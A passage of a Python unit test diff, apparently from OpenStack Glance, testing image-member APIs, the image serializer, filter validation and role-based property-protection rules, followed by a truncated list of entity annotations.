self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code) + + def test_replace_members_allowed_by_policy(self): + rules = {""modify_member"": '@'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}] + + req = webob.Request.blank('/images/%s/members' % UUID1) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(memberships=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + + def test_add_member(self): + """""" + Tests adding image members raises right exception + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=False) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 401) + + def test_add_member_non_existing_image(self): + """""" + Tests adding image members raises right exception + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + test_uri = '/images/%s/members/pattieblack' + req = webob.Request.blank(test_uri % _gen_uuid()) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_add_member_positive(self): + """""" + Tests adding image members + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + def test_add_member_with_body(self): + """""" + Tests 
adding image members + """""" + fixture = dict(can_share=True) + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + req.body = json.dumps(dict(member=fixture)) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + def test_add_member_forbidden_by_policy(self): + rules = {""modify_member"": '!'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID1) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code) + + def test_add_member_allowed_by_policy(self): + rules = {""modify_member"": '@'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID1) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + + def test_get_members_of_deleted_image_raises_404(self): + """""" + Tests members listing for deleted image raises 404. + """""" + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code) + self.assertTrue( + 'Image with identifier %s has been deleted.' % UUID2 in res.body) + + def test_delete_member_of_deleted_image_raises_404(self): + """""" + Tests deleting members of deleted image raises 404. + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True) + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'DELETE' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code) + self.assertTrue( + 'Image with identifier %s has been deleted.' % UUID2 in res.body) + + def test_update_members_of_deleted_image_raises_404(self): + """""" + Tests update members of deleted image raises 404. + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True) + + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}] + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(memberships=fixture)) + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code) + self.assertTrue( + 'Image with identifier %s has been deleted.' % UUID2 in res.body) + + def test_create_member_to_deleted_image_raises_404(self): + """""" + Tests adding members to deleted image raises 404. 
+ """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True) + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code) + self.assertTrue( + 'Image with identifier %s has been deleted.' % UUID2 in res.body) + + def test_delete_member(self): + """""" + Tests deleting image members raises right exception + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=False) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'DELETE' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 401) + + def test_delete_member_on_non_existing_image(self): + """""" + Tests deleting image members raises right exception + """""" + test_router = router.API(self.mapper) + api = test_utils.FakeAuthMiddleware(test_router, is_admin=True) + test_uri = '/images/%s/members/pattieblack' + req = webob.Request.blank(test_uri % _gen_uuid()) + req.method = 'DELETE' + + res = req.get_response(api) + self.assertEquals(res.status_int, 404) + + def test_delete_non_exist_member(self): + """""" + Test deleting image members raises right exception + """""" + test_router = router.API(self.mapper) + api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + req = webob.Request.blank('/images/%s/members/test_user' % UUID2) + req.method = 'DELETE' + res = req.get_response(api) + self.assertEquals(res.status_int, 404) + + def test_delete_image_member(self): + test_rserver = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_rserver, is_admin=True) + + # Add member to image: + fixture = dict(can_share=True) + test_uri = '/images/%s/members/test_add_member_positive' + req = webob.Request.blank(test_uri % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(member=fixture)) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + # Delete member + test_uri = '/images/%s/members/test_add_member_positive' + req = webob.Request.blank(test_uri % UUID2) + req.headers['X-Auth-Token'] = 'test1:test1:' + req.method = 'DELETE' + req.content_type = 'application/json' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + self.assertTrue('Forbidden' in res.body) + + def test_delete_member_allowed_by_policy(self): + rules = {""delete_member"": '@', ""modify_member"": '@'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + + def test_delete_member_forbidden_by_policy(self): + rules = {""delete_member"": '!', ""modify_member"": '@'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + res = req.get_response(self.api) + 
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code) + + +class TestImageSerializer(base.IsolatedUnitTest): + def setUp(self): + """"""Establish a clean test environment"""""" + super(TestImageSerializer, self).setUp() + self.receiving_user = 'fake_user' + self.receiving_tenant = 2 + self.context = glance.context.RequestContext( + is_admin=True, + user=self.receiving_user, + tenant=self.receiving_tenant) + self.serializer = images.ImageSerializer() + + def image_iter(): + for x in ['chunk', '678911234', '56789']: + yield x + + self.FIXTURE = { + 'image_iterator': image_iter(), + 'image_meta': { + 'id': UUID2, + 'name': 'fake image #2', + 'status': 'active', + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'is_public': True, + 'created_at': timeutils.utcnow(), + 'updated_at': timeutils.utcnow(), + 'deleted_at': None, + 'deleted': False, + 'checksum': 'PI:KEY', + 'size': 19, + 'owner': _gen_uuid(), + 'location': ""file:///tmp/glance-tests/2"", + 'properties': {}, + } + } + + def test_meta(self): + exp_headers = {'x-image-meta-id': UUID2, + 'x-image-meta-location': 'file:///tmp/glance-tests/2', + 'ETag': self.FIXTURE['image_meta']['checksum'], + 'x-image-meta-name': 'fake image #2'} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + req.remote_addr = ""127.0.0.1"" + req.context = self.context + response = webob.Response(request=req) + self.serializer.meta(response, self.FIXTURE) + for key, value in exp_headers.iteritems(): + self.assertEquals(value, response.headers[key]) + + def test_meta_utf8(self): + # We get unicode strings from JSON, and therefore all strings in the + # metadata will actually be unicode when handled internally. But we + # want to output utf-8. 
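+ # Editor's sketch (illustrative; Python 2 semantics as used here): + # u'\xe7\xe9'.encode('utf-8') -> '\xc3\xa7\xc3\xa9', a byte string + # safe to emit as an HTTP header, while the unicode original is not.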
+ FIXTURE = { + 'image_meta': { + 'id': unicode(UUID2), + 'name': u'fake image #2 with utf-8 éàè', + 'status': u'active', + 'disk_format': u'vhd', + 'container_format': u'ovf', + 'is_public': True, + 'created_at': timeutils.utcnow(), + 'updated_at': timeutils.utcnow(), + 'deleted_at': None, + 'deleted': False, + 'checksum': u'PI:KEY', + 'size': 19, + 'owner': unicode(_gen_uuid()), + 'location': u""file:///tmp/glance-tests/2"", + 'properties': { + u'prop_éé': u'ça marche', + u'prop_çé': u'çé', + } + } + } + exp_headers = {'x-image-meta-id': UUID2.encode('utf-8'), + 'x-image-meta-location': 'file:///tmp/glance-tests/2', + 'ETag': 'PI:KEY', + 'x-image-meta-size': '19', # str, not int + 'x-image-meta-name': 'fake image #2 with utf-8 éàè', + 'x-image-meta-property-prop_éé': 'ça marche', + 'x-image-meta-property-prop_çé': u'çé'.encode('utf-8')} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + req.remote_addr = ""127.0.0.1"" + req.context = self.context + response = webob.Response(request=req) + self.serializer.meta(response, FIXTURE) + self.assertNotEqual(type(FIXTURE['image_meta']['name']), + type(response.headers['x-image-meta-name'])) + self.assertEqual(response.headers['x-image-meta-name'].decode('utf-8'), + FIXTURE['image_meta']['name']) + for key, value in exp_headers.iteritems(): + self.assertEquals(value, response.headers[key]) + + FIXTURE['image_meta']['properties'][u'prop_bad'] = 'çé' + self.assertRaises(UnicodeDecodeError, + self.serializer.meta, response, FIXTURE) + + def test_show(self): + exp_headers = {'x-image-meta-id': UUID2, + 'x-image-meta-location': 'file:///tmp/glance-tests/2', + 'ETag': self.FIXTURE['image_meta']['checksum'], + 'x-image-meta-name': 'fake image #2'} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + req.context = self.context + response = webob.Response(request=req) + self.serializer.show(response, self.FIXTURE) + for key, value in exp_headers.iteritems(): + self.assertEquals(value, response.headers[key]) + + self.assertEqual(response.body, 'chunk67891123456789') + + def test_show_notify(self): + """"""Make sure an eventlet posthook for notify_image_sent is added."""""" + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + req.context = self.context + response = webob.Response(request=req) + response.request.environ['eventlet.posthooks'] = [] + + self.serializer.show(response, self.FIXTURE) + + #just make sure the app_iter is called + for chunk in response.app_iter: + pass + + self.assertNotEqual(response.request.environ['eventlet.posthooks'], []) + + def test_image_send_notification(self): + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + req.remote_addr = '127.0.0.1' + req.context = self.context + + image_meta = self.FIXTURE['image_meta'] + called = {""notified"": False} + expected_payload = { + 'bytes_sent': 19, + 'image_id': UUID2, + 'owner_id': image_meta['owner'], + 'receiver_tenant_id': self.receiving_tenant, + 'receiver_user_id': self.receiving_user, + 'destination_ip': '127.0.0.1', + } + + def fake_info(_event_type, _payload): + self.assertEqual(_payload, expected_payload) + called['notified'] = True + + self.stubs.Set(self.serializer.notifier, 'info', fake_info) + + glance.api.common.image_send_notification(19, 19, image_meta, req, + self.serializer.notifier) + + self.assertTrue(called['notified']) + + def test_image_send_notification_error(self): + """"""Ensure image.send notification is sent on error."""""" + req = webob.Request.blank(""/images/%s"" % 
UUID2) + req.method = 'GET' + req.remote_addr = '127.0.0.1' + req.context = self.context + + image_meta = self.FIXTURE['image_meta'] + called = {""notified"": False} + expected_payload = { + 'bytes_sent': 17, + 'image_id': UUID2, + 'owner_id': image_meta['owner'], + 'receiver_tenant_id': self.receiving_tenant, + 'receiver_user_id': self.receiving_user, + 'destination_ip': '127.0.0.1', + } + + def fake_error(_event_type, _payload): + self.assertEqual(_payload, expected_payload) + called['notified'] = True + + self.stubs.Set(self.serializer.notifier, 'error', fake_error) + + #expected and actually sent bytes differ + glance.api.common.image_send_notification(17, 19, image_meta, req, + self.serializer.notifier) + + self.assertTrue(called['notified']) + + def test_redact_location(self): + """"""Ensure location redaction does not change original metadata"""""" + image_meta = {'size': 3, 'id': '123', 'location': 'http://localhost'} + redacted_image_meta = {'size': 3, 'id': '123'} + copy_image_meta = copy.deepcopy(image_meta) + tmp_image_meta = glance.api.v1.images.redact_loc(image_meta) + + self.assertEqual(image_meta, copy_image_meta) + self.assertEqual(tmp_image_meta, redacted_image_meta) + + def test_noop_redact_location(self): + """"""Check no-op location redaction does not change original metadata"""""" + image_meta = {'size': 3, 'id': '123'} + redacted_image_meta = {'size': 3, 'id': '123'} + copy_image_meta = copy.deepcopy(image_meta) + tmp_image_meta = glance.api.v1.images.redact_loc(image_meta) + + self.assertEqual(image_meta, copy_image_meta) + self.assertEqual(tmp_image_meta, redacted_image_meta) + self.assertEqual(image_meta, redacted_image_meta) + + +class TestFilterValidator(base.IsolatedUnitTest): + def test_filter_validator(self): + self.assertFalse(glance.api.v1.filters.validate('size_max', -1)) + self.assertTrue(glance.api.v1.filters.validate('size_max', 1)) + self.assertTrue(glance.api.v1.filters.validate('protected', 'True')) + self.assertTrue(glance.api.v1.filters.validate('protected', 'FALSE')) + self.assertFalse(glance.api.v1.filters.validate('protected', '-1')) + + +class TestAPIProtectedProps(base.IsolatedUnitTest): + def setUp(self): + """"""Establish a clean test environment"""""" + super(TestAPIProtectedProps, self).setUp() + self.mapper = routes.Mapper() + # turn on property protections + self.set_property_protections() + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper)) + db_api.setup_db_env() + db_api.get_engine() + db_models.unregister_models(db_api._ENGINE) + db_models.register_models(db_api._ENGINE) + + def tearDown(self): + """"""Clear the test environment"""""" + super(TestAPIProtectedProps, self).tearDown() + self.destroy_fixtures() + + def destroy_fixtures(self): + # Easiest to just drop the models and re-create them... 
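+ # Editor's note: re-registering the models gives each test a pristine + # schema. An alternative (assumed, not from the original) would be to + # run each test inside a transaction and roll it back in tearDown.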
+ db_models.unregister_models(db_api._ENGINE) + db_models.register_models(db_api._ENGINE) + + def _create_admin_image(self, props={}): + request = unit_test_utils.get_fake_request(path='/images') + headers = {'x-image-meta-disk-format': 'ami', + 'x-image-meta-container-format': 'ami', + 'x-image-meta-name': 'foo', + 'x-image-meta-size': '0', + 'x-auth-token': 'user:tenant:admin'} + headers.update(props) + for k, v in headers.iteritems(): + request.headers[k] = v + created_image = request.get_response(self.api) + res_body = json.loads(created_image.body)['image'] + image_id = res_body['id'] + return image_id + + def test_prop_protection_with_create_and_permitted_role(self): + """""" + As admin role, create an image and verify permitted role 'member' can + create a protected property + """""" + image_id = self._create_admin_image() + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'x-image-meta-property-x_owner_foo': 'bar'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['x_owner_foo'], 'bar') + + def test_prop_protection_with_create_and_unpermitted_role(self): + """""" + As admin role, create an image and verify unpermitted role + 'fake_member' can *not* create a protected property + """""" + image_id = self._create_admin_image() + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:fake_member', + 'x-image-meta-property-x_owner_foo': 'bar'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code) + self.assertIn(""Property '%s' is protected"" % + ""x_owner_foo"", output.body) + + def test_prop_protection_with_show_and_permitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + permitted role 'member' can read that protected property via HEAD + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='HEAD', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:member'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + res2 = another_request.get_response(self.api) + self.assertEqual(res2.headers['x-image-meta-property-x_owner_foo'], + 'bar') + + def test_prop_protection_with_show_and_unpermitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + unpermitted role 'fake_role' can *not* read that protected property via + HEAD + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='HEAD', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:fake_role'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + self.assertEqual('', output.body) + self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers) + + def test_prop_protection_with_get_and_permitted_role(self): + """""" + As admin role, create an image with a protected
property, and verify + permitted role 'member' can read that protected property via GET + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='GET', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:member'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + res2 = another_request.get_response(self.api) + self.assertEqual(res2.headers['x-image-meta-property-x_owner_foo'], + 'bar') + + def test_prop_protection_with_get_and_unpermitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + unpermitted role 'fake_role' can *not* read that protected property via + GET + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='GET', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:fake_role'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + self.assertEqual('', output.body) + self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers) + + def test_prop_protection_with_detail_and_permitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + permitted role 'member' can read that protected property via + /images/detail + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='GET', path='/images/detail') + headers = {'x-auth-token': 'user:tenant:member'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + res_body = json.loads(output.body)['images'][0] + self.assertEqual(res_body['properties']['x_owner_foo'], 'bar') + + def test_prop_protection_with_detail_and_unpermitted_role(self): + """""" + As admin role, create an image with a protected property, and verify + unpermitted role 'fake_role' can *not* read that protected property via + /images/detail + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + method='GET', path='/images/detail') + headers = {'x-auth-token': 'user:tenant:fake_role'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + res_body = json.loads(output.body)['images'][0] + self.assertNotIn('x_owner_foo', + res_body['properties']) + + def test_prop_protection_with_update_and_permitted_role(self): + """""" + As admin role, create an image with protected property, and verify + permitted role 'member' can update that protected property + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'x-image-meta-property-x_owner_foo': 'baz'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['x_owner_foo'], 'baz') + + def
test_prop_protection_with_update_and_unpermitted_role(self): + """""" + As admin role, create an image with protected property, and verify + unpermitted role 'fake_role' can *not* update that protected property + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:fake_role', + 'x-image-meta-property-x_owner_foo': 'baz'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code) + self.assertIn(""Property '%s' is protected"" % + ""x_owner_foo"", output.body) + + def test_prop_protection_update_without_read(self): + """""" + Test protected property cannot be updated without read permission + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-spl_update_only_prop': 'foo'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_update_only_prop': 'bar'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code) + self.assertIn(""Property '%s' is protected"" % + ""spl_update_only_prop"", output.body) + + def test_prop_protection_update_noop(self): + """""" + Test protected property update is allowed as long as the user has read + access and the value is unchanged + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-spl_read_prop': 'foo'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_read_prop': 'foo'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['spl_read_prop'], 'foo') + self.assertEquals(output.status_int, 200) + + def test_prop_protection_with_delete_and_permitted_role(self): + """""" + As admin role, create an image with protected property, and verify + permitted role 'member' can delete that protected property + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties'], {}) + + def test_prop_protection_with_delete_and_unpermitted_read(self): + """""" + Test protected property cannot be deleted without read permission + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-x_owner_foo': 'bar'}) + + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:fake_role', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, 200) +
self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers) + + another_request = unit_test_utils.get_fake_request( + method='HEAD', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:admin'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + self.assertEqual('', output.body) + self.assertEqual(output.headers['x-image-meta-property-x_owner_foo'], + 'bar') + + def test_prop_protection_with_delete_and_unpermitted_delete(self): + """""" + Test protected property cannot be deleted without delete permission + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-spl_update_prop': 'foo'}) + + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEquals(output.status_int, 403) + self.assertIn(""Property '%s' is protected"" % + ""spl_update_prop"", output.body) + + another_request = unit_test_utils.get_fake_request( + method='HEAD', path='/images/%s' % image_id) + headers = {'x-auth-token': 'user:tenant:admin'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 200) + self.assertEqual('', output.body) + self.assertEqual( + output.headers['x-image-meta-property-spl_update_prop'], 'foo') + + def test_read_protected_props_leak_with_update(self): + """""" + Verify when updating props that ones we don't have read permission for + are not disclosed + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-spl_update_prop': '0', + 'x-image-meta-property-foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_update_prop': '1', + 'X-Glance-Registry-Purge-Props': 'False'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['spl_update_prop'], '1') + self.assertNotIn('foo', res_body['properties']) + + def test_update_protected_props_mix_no_read(self): + """""" + Create an image with two props - one only readable by admin, and one + readable/updatable by member. Verify member can successfully update + their property while the admin owned one is ignored transparently + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-admin_foo': 'bar', + 'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'x-image-meta-property-x_owner_foo': 'baz'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(res_body['properties']['x_owner_foo'], 'baz') + self.assertNotIn('admin_foo', res_body['properties']) + + def test_update_protected_props_mix_read(self): + """""" + Create an image with two props - one readable/updatable by admin, but + also readable by spl_role.
The other is readable/updatable by + spl_role. Verify spl_role can successfully update their property but + not the admin owned one + """""" + custom_props = { + 'x-image-meta-property-spl_read_only_prop': '1', + 'x-image-meta-property-spl_update_prop': '2' + } + image_id = self._create_admin_image(custom_props) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + + # verify spl_role can update its prop + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_read_only_prop': '1', + 'x-image-meta-property-spl_update_prop': '1'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertEqual(output.status_int, 200) + self.assertEqual(res_body['properties']['spl_read_only_prop'], '1') + self.assertEqual(res_body['properties']['spl_update_prop'], '1') + + # verify spl_role cannot update admin controlled prop + headers = {'x-auth-token': 'user:tenant:spl_role', + 'x-image-meta-property-spl_read_only_prop': '2', + 'x-image-meta-property-spl_update_prop': '1'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 403) + + def test_delete_protected_props_mix_no_read(self): + """""" + Create an image with two props - one only readable by admin, and one + readable/deletable by member. Verify member can successfully delete + their property while the admin owned one is ignored transparently + """""" + image_id = self._create_admin_image( + {'x-image-meta-property-admin_foo': 'bar', + 'x-image-meta-property-x_owner_foo': 'bar'}) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:member', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + res_body = json.loads(output.body)['image'] + self.assertNotIn('x_owner_foo', res_body['properties']) + self.assertNotIn('admin_foo', res_body['properties']) + + def test_delete_protected_props_mix_read(self): + """""" + Create an image with two props - one readable/deletable by admin, but + also readable by spl_role. The other is readable/deletable by + spl_role. Verify spl_role is forbidden to purge_props in this scenario + without retaining the readable prop.
+ """""" + custom_props = { + 'x-image-meta-property-spl_read_only_prop': '1', + 'x-image-meta-property-spl_delete_prop': '2' + } + image_id = self._create_admin_image(custom_props) + another_request = unit_test_utils.get_fake_request( + path='/images/%s' % image_id, method='PUT') + headers = {'x-auth-token': 'user:tenant:spl_role', + 'X-Glance-Registry-Purge-Props': 'True'} + for k, v in headers.iteritems(): + another_request.headers[k] = v + output = another_request.get_response(self.api) + self.assertEqual(output.status_int, 403) +",119145,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['DATE_TIME', '2010-2011'], ['PERSON', 'glance.db.sqlalchemy'], ['PERSON', 'db_api'], ['PERSON', 'glance.db.sqlalchemy'], ['PERSON', 'CONF\n\n_'], ['PERSON', 'TestGlanceAPI(base'], ['PERSON', 'FIXTURES'], ['PERSON', 'FIXTURES'], ['LOCATION', 'self.test_dir'], ['PERSON', 'ari'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['LOCATION', 'res.body'], ['LOCATION', 'res.body'], ['LOCATION', 'res.body'], ['PERSON', 'ari'], ['PERSON', 'ami'], ['LOCATION', 'res.body'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'qcow2'], ['PERSON', 'qcow2'], ['PERSON', 'FIXTURES'], 